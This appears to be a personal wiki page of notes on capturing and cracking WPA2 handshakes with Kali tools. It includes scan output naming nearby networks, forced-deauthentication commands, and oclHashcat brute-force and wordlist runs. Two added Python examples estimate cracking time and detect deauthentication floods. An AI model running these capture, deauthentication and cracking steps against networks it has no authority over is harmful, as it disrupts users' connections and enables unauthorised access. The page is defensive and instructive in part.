Ben's notes

Linux, Unix, network, radio...


Capture WPA2 handshake

Hardware

  • Intel NUC
  • Intel Centrino 6235

Install Kali

  • Install Kali from USB.
  • Create user account.
  • Update.
    apt-get update
    apt-get upgrade
  • Install and enable SSHd.
    apt-get install ssh
    /etc/init.d/ssh start
    update-rc.d ssh enable

Capture with wifite

  • Start scanning.
    # wifite wpa2
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  -------                1  WPA2  34db    no   client
        2  -------               13  WPA2  34db    no   clients
        3  UPC245788570          11  WPA2  30db   wps
        4  UPC486785_EXT         11  WPA2  26db   wps
        5  UPC WifiSpots         11  WPA2  25db    no
        6  UPC486785             11  WPA2  22db    no   clients
        7  -------               11  WPA2  21db    no
        8  UPC1461170             1  WPA2  19db    no   clients
        9  VGV7519558FA2          6  WPA2  18db   wps
       10  UPC WifiSpots          1  WPA2  18db    no
       11  -------               11  WPA2  18db    no   client
       12  UPC501677338          36  WPA2  17db    no
       13  UPC245248760           6  WPA2  16db   wps   client
       14  -------              100  WPA2  15db    no
       15  H368N67798A            6  WPA2  13db   wps
       16  Ka1717169              9  WPA2  13db    no   client
       17  UPC249259973          11  WPA2  13db   wps   client
       18  UPC244634263          11  WPA2  13db   wps
       19  UPC240228706           1  WPA2  13db   wps   client
       20  UPC WifiSpots          9  WPA2  12db    no
       21  UPC1263286             6  WPA2  11db    no
       22  UPC2176918             6  WPA2  11db    no
       23  UPC WifiSpots          6  WPA2  11db    no
       24  -------                6  WPA2  10db   wps
       25  -------                1  WPA2  10db   wps
       26  Sitecom8CF98C          8  WPA2  10db   wps
       27  -------                1  WPA2   9db    no
       28  -------                6  WPA2   9db    no
       29  UPC247811359           1  WPA2   9db   wps   clients
       30  UPC241613374          11  WPA2   9db   wps
       31  UPC0988912            13  WPA2   7db    no   client
    
     [0:01:54] scanning wireless networks. 31 targets and 15 clients found
    
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
  • Press ctrl-c when ready
  • Enter target number.
     [+] select target numbers (1-19) separated by commas, or 'all': 2
    
     [+] 1 target selected.
    
     [0:08:20] starting wpa handshake capture on "--------"
     [0:08:09] new client found: 04:F7:E4:51:E7:A8
     [0:08:08] listening for handshake...
     [0:00:12] handshake captured! saved as "hs/--------.cap"
    
     [+] 1 attack completed:
    
     [+] 1/1 WPA attacks succeeded
            Schenkel (D4:CA:6D:53:23:41) handshake captured
            saved as hs/--------.cap
    
     [+] starting WPA cracker on 1 handshake
     [!] no WPA dictionary found! use -dict <file> command-line argument
    
     [+] quitting
  • Clean the capture file.
    # wpaclean cleanwpa.cap --------.cap
    Pwning --------.cap (1/1 100%)
    Net d4:ca:6d:53:23:41 --------
    Done
  • Convert the .cap file to .hccap format for oclHashcat.
    # aircrack-ng cleanwpa.cap -J out
    Opening cleanwpa.cap
    Read 3 packets.
    
       #  BSSID              ESSID                     Encryption
    
       1  D4:CA:6D:53:23:41  --------                  WPA (1 handshake)
    
    Choosing first network as target.
    
    Opening cleanwpa.cap
    Reading packets, please wait...
    
    Building Hashcat (1.00) file...
    
    [*] ESSID (length: 8): --------
    [*] Key version: 2
    [*] BSSID: D4:CA:6D:53:23:41
    [*] STA: 04:F7:E4:51:E7:A8
    [*] anonce:
        3B 00 01 41 3D 46 19 79 80 E6 90 E6 AB 3C DB 07
        -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
    [*] snonce:
        C6 0A 60 A0 05 03 AF CE FC E4 E7 24 72 4A 24 AC
        -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
    [*] Key MIC:
        AD 60 F8 4B 42 B1 CF E7 9F 82 97 0D 11 B7 CC F1
    [*] eapol:
        01 03 00 75 02 01 0A 00 10 00 00 00 00 00 00 00
        -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
        -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
        4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
        04 01 00 00 0F AC 02 0C 00
    
    Successfully written to out.hccap
    
    
    Quitting aircrack-ng...
  • Try cracking with oclHashcat (brute-force mask attack).
    oclHashcat64.exe -m 2500 out-wpa2.hccap -a 3 -1 ?l?u?d ?1?1?1?1?1?1?1?1?1?1?1?1
    Session.Name...: oclHashcat
    Status.........: Aborted
    Input.Mode.....: Mask (?1?1?1?1?1?1?1?1?1?1?1?1) [12]
    Hash.Target....: -------- (04:f7:e4:51:e7:a8 <-> d4:ca:6d:53:23:41)
    Hash.Type......: WPA/WPA2
    Time.Started...: Thu Jun 12 22:01:32 2014 (2 mins, 5 secs)
    Time.Estimated.: > 10 Years
    Speed.GPU.#1...:   126.6 kH/s
    Speed.GPU.#2...:   129.0 kH/s
    Speed.GPU.#3...:   129.2 kH/s
    Speed.GPU.#4...:   124.4 kH/s
    Speed.GPU.#5...:   129.1 kH/s
    Speed.GPU.#6...:   129.0 kH/s
    Speed.GPU.#*...:   767.2 kH/s
    Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
    Progress.......: 94814208/16533293572437839872 (0.00%)
    Skipped........: 0/94814208 (0.00%)
    Rejected.......: 0/94814208 (0.00%)
    HWMon.GPU.#1...: 83% Util, 61c Temp, 61% Fan
    HWMon.GPU.#2...: 86% Util, 62c Temp, 60% Fan
    HWMon.GPU.#3...: 84% Util, 65c Temp, 48% Fan
    HWMon.GPU.#4...: 85% Util, 63c Temp, 44% Fan
    HWMon.GPU.#5...: 84% Util, 58c Temp, 40% Fan
    HWMon.GPU.#6...: 87% Util, 63c Temp, 48% Fan
    
    Started: Thu Jun 12 22:01:32 2014
    Stopped: Thu Jun 12 22:03:40 2014
  • Or try with wordlist and rules.
    oclHashcat64.exe -a 0 -r rules\best64.rule -m 2500 -o foundpass.txt out-wpa2.hccap totaal_cleanfile.txt
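The "Time.Estimated.: > 10 Years" line above is just the mask keyspace divided by the aggregate hash rate. The following is an added example (not part of the original notes) that reproduces that arithmetic in Python so you can see why the 12-character alphanumeric mask is hopeless at ~767 kH/s, and turn the question around: given a cracking rate, how long does a uniformly random passphrase need to be to stay out of reach for a chosen number of years? The mask tokens and class sizes are hashcat's built-in ones; the function names are my own.

```python
"""Estimate brute-force time for a hashcat-style mask against WPA2-PSK.

Added example, not from the original notes. It reproduces the arithmetic
behind oclHashcat's "Time.Estimated" line from the mask and the hash rate,
and derives the minimum random-passphrase length that keeps a given rig
busy for a chosen number of years. Function names are assumptions.
"""
from __future__ import annotations

# Sizes of hashcat's built-in character classes.
CHARSET_SIZE = {"?l": 26, "?u": 26, "?d": 10, "?s": 33, "?a": 95}

SECONDS_PER_YEAR = 365.25 * 24 * 3600


def _tokens(mask: str) -> list[str]:
    """Split '?1?1?d' into ['?1', '?1', '?d'], rejecting malformed input."""
    if len(mask) % 2 or any(mask[i] != "?" for i in range(0, len(mask), 2)):
        raise ValueError(f"malformed mask {mask!r}")
    return [mask[i:i + 2] for i in range(0, len(mask), 2)]


def keyspace(mask: str, custom: dict[str, str] | None = None) -> int:
    """Number of candidates a mask expands to.

    `custom` maps a custom class such as '?1' to its definition ('?l?u?d'),
    mirroring the `-1 ?l?u?d` argument in the oclHashcat command above.
    """
    custom = custom or {}
    total = 1
    for tok in _tokens(mask):
        if tok in custom:
            size = sum(CHARSET_SIZE[t] for t in _tokens(custom[tok]))
        elif tok in CHARSET_SIZE:
            size = CHARSET_SIZE[tok]
        else:
            raise ValueError(f"unknown mask token {tok!r}")
        total *= size
    return total


def years_to_exhaust(mask: str, rate_hps: float,
                     custom: dict[str, str] | None = None) -> float:
    """Years needed to try every candidate at `rate_hps` hashes per second.

    On average a hit lands halfway through, so halve this for the mean.
    """
    return keyspace(mask, custom) / rate_hps / SECONDS_PER_YEAR


def min_length_for(alphabet_size: int, rate_hps: float, years: float) -> int:
    """Smallest length of a uniformly random passphrase over `alphabet_size`
    symbols whose full keyspace takes at least `years` to exhaust at `rate_hps`."""
    budget = years * SECONDS_PER_YEAR * rate_hps   # candidates the rig can test
    n = 1
    while alphabet_size ** n < budget:
        n += 1
    return n


if __name__ == "__main__":
    mask = "?1" * 12
    custom = {"?1": "?l?u?d"}
    rate = 767_200.0  # Speed.GPU.#* from the session above
    print(f"keyspace: {keyspace(mask, custom):,}")
    print(f"years to exhaust: {years_to_exhaust(mask, rate, custom):.3g}")
    print(f"chars needed for 10 years at this rate: {min_length_for(62, rate, 10)}")
```

At 767.2 kH/s the 62^12 keyspace takes on the order of 10^8 years to exhaust, which is what oclHashcat reports as "> 10 Years"; even nine random alphanumeric characters already push full exhaustion past a decade on that rig. The rate is the variable that moves: a current multi-GPU box is roughly two orders of magnitude faster, so scale `rate_hps` accordingly before drawing conclusions about your own network.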

Capture with airmon-ng and airodump-ng

  • Enable monitor mode on WiFi.
    # airmon-ng start wlan0
    
    
    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID	Name
    2506	NetworkManager
    2633	wpa_supplicant
    
    
    Interface	Chipset		Driver
    
    wlan0		Intel 6235	iwlwifi - [phy0]
    				(monitor mode enabled on mon0)
  • Find nearby wireless networks. If targeting a specific AP, fix the channel with '-c <chan_num>'.
    # airodump-ng mon0
     CH  8 ][ Elapsed: 1 min ][ 2014-06-12 21:06
    
     BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     D4:CA:6D:53:23:41  -61      158       25    0  13  54e. WPA2 CCMP   PSK  --------
     D4:CA:6D:52:5D:E9  -61      141       13    0   1  54e. WPA2 CCMP   PSK  --------
     DC:71:44:DE:35:F8  -66      234        0    0  11  54e  WPA2 CCMP   PSK  UPC245788570
     04:A1:51:22:3A:34  -76      158        8    0  11  54e  WPA2 CCMP   PSK  UPC486785_EXT
     EA:40:F2:B1:A3:E7  -76      131        0    0  11  54e  WPA2 CCMP   MGT  UPC WifiSpots
     E8:40:F2:B1:A3:E5  -78      134        9    0  11  54e  WPA2 CCMP   PSK  UPC486785
     CE:BC:C8:FE:EA:C3  -80       85        0    0  11  54e. WPA2 CCMP   PSK  --------
     C8:BC:C8:FE:EA:C3  -80       93        2    0  11  54e. WPA2 CCMP   PSK  --------
     44:32:C8:FC:EB:9B  -84       40        0    0   1  54e  WPA2 CCMP   PSK  UPC1461170
     88:03:55:55:8F:A2  -83       61        0    0   6  54e  WPA2 CCMP   PSK  VGV7519558FA2
     5C:A3:9D:80:A3:98  -83       44        0    0   6  54e  WPA2 CCMP   PSK  UPC245248760
     46:32:C8:FC:EB:9D  -85       40        0    0   1  54e  WPA2 CCMP   MGT  UPC WifiSpots
     8C:E0:81:67:79:8A  -86       20        0    0   6  54e  WPA2 CCMP   PSK  H368N67798A
     14:49:E0:A4:70:28  -86       13        3    0  11  54e  WPA2 CCMP   PSK  UPC249259973
     5C:A3:9D:98:21:F8  -86       17        0    0  11  54e  WPA2 CCMP   PSK  UPC244634263
     5C:A3:9D:FD:13:E8  -85       36        0    0   1  54e  WPA2 CCMP   PSK  UPC240228706
     00:0C:F6:91:6A:78  -88       22        1    0  11  54e. WPA2 CCMP   PSK  Sitecom916A78
     C4:27:95:75:D8:95   -1        0        0    0   7  -1                    <length:  0>
     DC:71:44:A8:08:88  -90        2        0    0   1  54e  WPA2 CCMP   PSK  UPC242046314
     CE:BC:C8:FE:EA:C4  -86        1        0    0 100  54e  WPA2 CCMP   PSK  --------
     DC:71:44:DE:35:F0  -84        1        0    0  36  54e  WPA2 CCMP   PSK  UPC501677338
    
     BSSID              STATION            PWR   Rate    Lost    Frames  Probe
    
     (not associated)   14:99:E2:43:58:65  -82    0 - 1      0       11  UPC1461170
     (not associated)   F0:25:B7:EB:D2:83  -90    0 - 1      0        1  H368N67798A
     D4:CA:6D:53:23:41  74:E1:B6:95:01:69  -71    0e- 0      0        9
     D4:CA:6D:53:23:41  04:F7:E4:51:E7:A8  -84    0 -24     10        8  --------
     E8:40:F2:B1:A3:E5  04:A1:51:22:3A:34   -1    0e- 0      0        1
     C8:BC:C8:FE:EA:C3  F0:27:65:D7:0D:09  -86    0 - 1      0        1
     44:32:C8:FC:EB:9B  A4:D1:D2:6A:1B:1D   -1    1e- 0      0        1
     14:49:E0:A4:70:28  C0:CB:38:01:1D:31   -1    1e- 0      0        1
     C4:27:95:75:D8:95  00:22:FA:96:D5:0C  -82    0 - 6e     0        4
  • Dump packets from target channel.
    # airodump-ng --channel 11 --bssid 00:11:22:33:44:55 --write channel11 mon0
  • Wait for handshake… or
  • Deauthenticate client from network.
    # aireplay-ng --deauth 0 -a <AP_MAC> -c <CLIENT_MAC> mon0
  • Or if you don't know the MAC of any associated client, broadcast a deauth.
    # aireplay-ng --deauth 0 -a <AP_MAC> mon0
  • Extract handshakes (EAPOL frames plus the frames matching the second filter term, so the ESSID survives). The display filter must be quoted, otherwise the shell treats '||' as a command separator.
    tshark -r <input file name> -R "eapol || wlan.fc.type_subtype == 0x88" -w <output file name>
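From the other side of the air, the `aireplay-ng --deauth` step above is a burst of deauthentication frames from one transmitter, which is exactly what a wireless IDS looks for. The following is an added example, not part of the original notes: it takes per-frame records of the kind you would export with `tshark -T fields -e frame.time_epoch -e wlan.sa -e wlan.da -e wlan.fc.type_subtype` and flags any transmitter that sends more deauthentication frames inside a short window than a real AP plausibly would. The sample lines, the MAC addresses, the thresholds and the function names are all constructed here.

```python
"""Flag deauthentication floods in a per-frame log.

Added example, not part of the original notes. Input lines are tab-separated
(epoch time, source MAC, destination MAC, frame type/subtype as hex), the
shape produced by tshark -T fields with the fields named in the lead-in.
The sample below is constructed; the MACs are placeholders.
"""
from collections import defaultdict
from typing import Dict, Iterable, Iterator, List, Tuple

DEAUTH_SUBTYPE = 0x0C   # 802.11 management frame, subtype 12 = deauthentication
BEACON_SUBTYPE = 0x08
BROADCAST = "ff:ff:ff:ff:ff:ff"

Record = Tuple[float, str, str, int]


def parse_records(lines: Iterable[str]) -> Iterator[Record]:
    """Yield (time, src, dst, type_subtype); skip blanks and '#' comments."""
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        t, src, dst, fc = line.split("\t")
        # tshark prints the field as 0x0c or 0x000c depending on version; int() takes both.
        yield float(t), src.lower(), dst.lower(), int(fc, 16)


def find_deauth_floods(lines: Iterable[str], window_s: float = 2.0,
                       threshold: int = 10) -> Dict[str, int]:
    """Return {source_mac: peak_count} for every transmitter that sent at least
    `threshold` deauthentication frames within any `window_s`-second window."""
    times: Dict[str, List[float]] = defaultdict(list)
    for t, src, _dst, fc in parse_records(lines):
        if fc == DEAUTH_SUBTYPE:
            times[src].append(t)

    alerts: Dict[str, int] = {}
    for src, ts in times.items():
        ts.sort()
        start = 0
        peak = 0
        # Sliding window: advance `start` until the window fits in window_s.
        for end, t in enumerate(ts):
            while t - ts[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[src] = peak
    return alerts


def constructed_sample() -> List[str]:
    """Constructed frame log: normal beacons, one legitimate deauth from a
    second AP, then a 25-frame broadcast deauth burst from the first AP's MAC."""
    ap = "00:11:22:33:44:55"        # placeholder AP address
    other_ap = "66:77:88:99:aa:bb"  # placeholder second AP
    client = "aa:bb:cc:dd:ee:ff"    # placeholder client
    lines = ["# time\tsrc\tdst\ttype_subtype"]
    for i in range(120):            # ~12 s of beacons every 100 ms, benign
        lines.append(f"{1000.0 + i * 0.1:.3f}\t{ap}\t{BROADCAST}\t0x{BEACON_SUBTYPE:02x}")
    lines.append(f"1005.000\t{other_ap}\t{client}\t0x{DEAUTH_SUBTYPE:02x}")  # single deauth, benign
    for i in range(25):             # burst: 25 deauths in 1.2 s to broadcast
        lines.append(f"{1010.0 + i * 0.05:.3f}\t{ap}\t{BROADCAST}\t0x{DEAUTH_SUBTYPE:02x}")
    return lines


if __name__ == "__main__":
    for mac, count in find_deauth_floods(constructed_sample()).items():
        print(f"ALERT: {mac} sent {count} deauth frames within 2 s")
```

The window and threshold are deliberately conservative: a real AP emits a handful of deauthentications when it reboots or evicts idle clients, but tens per second to the broadcast address for minutes on end is the signature of a forged flood. Because the frames are unauthenticated in pre-802.11w networks, the only mitigation is enabling Protected Management Frames (802.11w) on APs and clients that support it; the detector above at least tells you it is happening.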
capture_wpa_handshake.txt · Last modified: 2021/10/09 15:14 by 127.0.0.1